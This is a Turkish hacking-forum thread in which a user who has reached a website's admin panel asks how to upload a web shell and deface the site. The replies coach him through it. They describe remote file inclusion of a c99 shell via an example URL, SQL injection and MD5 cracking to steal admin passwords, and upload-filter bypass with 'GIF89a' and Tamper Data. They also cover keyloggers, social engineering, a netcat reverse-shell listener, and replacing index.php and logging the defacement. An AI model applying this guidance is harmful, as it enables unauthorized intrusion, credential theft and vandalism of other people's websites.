Siteye Shell Nasıl Atılır?

[ScriptKid]

Bir web sitesinin admi paneline girebiliyorum ve siteye index basmak istiyorum ama yapadım biraz araştırdım ve shell atmam gerekiyormuş peki shell nedir ve shell nasıl atılır?

 

['CaptainKanka]

SQLi OTO Shell Upload

Merhaba Değerli TurkHackTeam Ailesi. Bu Konumda Sizlere SQLi Açığı İle OTO Shell Basmayı Göstereceğim. Açık: SQLi Kullanılacak Araçlar: SQLMAP Ilk Olarak Hedef Sitemizi Belirleyelim Benim Hedef Sitem Bu --> https://www.vanityfail.sk/2018/10/ Resimdede Görüldüğü Üzere Sitede Açık Var...

www.turkhackteam.org

XSS Açığı İle Reverse Shell!

Merhaba Değerli TurkHackTeam Ailesi. Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim. Benim Hedef Sitem USA.com. Şimdi Terminali Açıp Şu Komutu Yazalım. Kod = nc -lnvp 4444 Şuan NetCat Aracımızı Dinlemeye Aldık Devam...

www.turkhackteam.org

Daha fazla içerik için forumumuzda bulunan

Web & Server Güvenliği ve Zafiyetler

Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini defansif ve ofansif yönleri ile bu bölümdeki konularla öğrenebilirsiniz.

www.turkhackteam.org

kategorisini inceleyebilirsin.

 

['Chan]

Merhabalar,
Shell atma olayı sitenin kullandığı altyapıya göre değişiklik göstermektedir. WordPress'de File upload eklentileriyle shell atabiliyorken, Opencart'da sunucu bölümünden log dosyasını değiştirirsiniz ve o şekilde shell atarsınız. Shell yükleme işlemleri sadece dosya upload yerlerinden yapılmaz. Mesela bazen php dosyasını kabul etmediği zaman tamper data tarzı mozilla eklentilerini kullananırsınız. Shell'i txt veya resim olarak kaydedersiniz ve yükleme olayını atlatırsınız. Sonra dosya yoluna giderek shell'i görüntüleyebilirsiniz. Aşağıda WordPress ve Opencart için shell atma yolları bulunuyor. Denemeyeli uzun zaman oluyor ama mantığını anlamada ve altyapıya göre yükleme işleminin farklılığını görmenizde fayda sağlar.

Shell Nasıl Atılır?

Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz
* SQL Injection Açıklarından Faydalanabiliriz
* Exploits Kullanarak Yükleme Yapabiliriz
* Upload Açıklarından Faydalanabiliriz
* Logger vb Spy Yazılımlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz

1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı Shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı Shell Yükleyebiliriz. veya Bağlandığımız .Txt Shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.

Örnek:

http://www.Siteadresi.com/İndex.php?acık=Http://Siteadresi.com/c99.txt?

İle Bağlandığımız Siteye .php Uzantılı Shelli Upload Edersek Kullanımı Şu Şekilde Olur.

http://www.Siteadresi.com/c99.php

Şeklinde Kullanıma Geçebiliriz.

RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.

2) SQL Injection Açığıyla Nasıl Shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, Nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Crackerler Yardımıyla Kırarız.

Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur Shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.

SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.
3) Exploits Kullanarak Shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden Shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.

Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında Shellerim Bulunmakta.
4) Upload Açıklarından Faydalanarak Sitelere Shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı Shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin Shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz Shelli Resim Dosyası Olarak Görmesini Sağlarız.
Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.

upload.php , upload.asp , upload.htm , upload.html
Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.
5) Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. Logger vb Spy Yazılımlar Sayesinde Shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız. Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen FTP Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan Shell Upload Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.
6) Bu Maddemizde İse Diyelim ki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir Hesap Açarız Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve FTP mize Shell Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparak da Hedef Siteye Ulaşabiliriz.
7) Sosyal Mühendislik Yöntemiyle Siteye Shell Yükleye Biliriz. Burada İşin İçine SM Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak Shell Atabilir.

Mantığı anlamanız adına yukarıda farklı bir siteden yazı bulunuyor. Temel olarak mantığını anlattığından dolayı paylaşmak istedim

 

[ScriptKid]

ben korumasız bir siteye php formatında shell attım şimdi nasıl index basabilirim?

Merhabalar,
Shell atma olayı sitenin kullandığı altyapıya göre değişiklik göstermektedir. WordPress'de File upload eklentileriyle shell atabiliyorken, Opencart'da sunucu bölümünden log dosyasını değiştirirsiniz ve o şekilde shell atarsınız. Shell yükleme işlemleri sadece dosya upload yerlerinden yapılmaz. Mesela bazen php dosyasını kabul etmediği zaman tamper data tarzı mozilla eklentilerini kullananırsınız. Shell'i txt veya resim olarak kaydedersiniz ve yükleme olayını atlatırsınız. Sonra dosya yoluna giderek shell'i görüntüleyebilirsiniz. Aşağıda WordPress ve Opencart için shell atma yolları bulunuyor. Denemeyeli uzun zaman oluyor ama mantığını anlamada ve altyapıya göre yükleme işleminin farklılığını görmenizde fayda sağlar.

Mantığı anlamanız adına yukarıda farklı bir siteden yazı bulunuyor. Temel olarak mantığını anlattığından dolayı paylaşmak istedim

ben upload açıklarından yararlandım bu arada attığım shell nerede

 

['Chan]

ben upload açıklarından yararlandım bu arada attığım shell nerede

Tekrardan merhaba. Sanırım bu yine siteye göre değişiklik gösteriyor. Mesela upload bölümünde yer alan dosyalar turkhackteam.org/upload/shellismi.php klasörüne veya direkt ana dizine yani turkhackteam.org/shellismi.php/ bölümüne de gidiyor olabilir. Kullandığı altyapıyı ve yüklenilen dosyaları nereye yüklediğini bulmalısınız. Bu yöntem işe yaramazsa "shell finder" programlarını deneyebilirsiniz veya upload açığının bulunduğu sayfa kaynağından yüklenilen dizine ulaşmayı deneyebilirsiniz.


Shell yükleyerek index atmaktansa, direkt olarak index dosyanızı gönderebilirsiniz ve o URL'yi kayıt(zone) altına alabilirsiniz.(Tabii ki direkt olarak ana sayfaya atmak istemiyorsanız.)

 

[ScriptKid]

Tekrardan merhaba. Sanırım bu yine siteye göre değişiklik gösteriyor. Mesela upload bölümünde yer alan dosyalar turkhackteam.org/upload/shellismi.php klasörüne veya direkt ana dizine yani turkhackteam.org/shellismi.php/ bölümüne de gidiyor olabilir. Kullandığı altyapıyı ve yüklenilen dosyaları nereye yüklediğini bulmalısınız. Bu yöntem işe yaramazsa "shell finder" programlarını deneyebilirsiniz veya upload açığının bulunduğu sayfa kaynağından yüklenilen dizine ulaşmayı deneyebilirsiniz.


Shell yükleyerek index atmaktansa, direkt olarak index dosyanızı gönderebilirsiniz ve o URL'yi kayıt(zone) altına alabilirsiniz.(Tabii ki direkt olarak ana sayfaya atmak istemiyorsanız.)

yani ben upload yerine indeximi atsam direk sitenin indexini değiştirmiş mi olurum?

 

['Chan]

yani ben upload yerine indeximi atsam direk sitenin indexini değiştirmiş mi olurum?

Mantık yine shell atmakla aynı ama upload açığının bulunduğu yerden index dosyanızı yüklediğiniz zaman bu sunucuya yüklenir ama ana sayfada index'iniz görünmez. Benim demek istediğim, ana sayfada görünüp/görünmemesi sizin için fark etmiyorsa, shell yerine direkt index.php dosyanızı yüklersiniz ve yüklendiği URL'yi zone(Kayıt altına almak, mirror kaydı) alırsınız. Ana sayfada index'inizin gözükmesini istiyorsanız, shell yükledikten sonra shell'i görüntüleyin ve index.php veya html dosyasını değiştirerek, kendi kodlarınızı yapıştırın.


Sitenin admin paneline girdiyseniz, index atmak yerine yeni gönderi oluşturabiliyorsanız, hacked by vs. Gibisinden yeni bir gönderi yayımlayabilir ve onun kaydını da alabilirsiniz.

 

[MuhammedTr768]

Bir web sitesinin admi paneline girebiliyorum ve siteye index basmak istiyorum ama yapadım biraz araştırdım ve shell atmam gerekiyormuş peki shell nedir ve shell nasıl atılır?

Wordpress sitesi ise file manager eklentisini yukleyeyip Shell dosyasını ekleyebilirsin admin panelinde eklentiler bölümünde. Onun dışında tamperdata ile sadece foto yüklenen sitelerin foto dosyasını PHP dosyasına çevirerek Shell basabilirsin.

 

[7as]

Merhaba , forumda konum bulunmaktadır : İndex Nasıl Basılır ?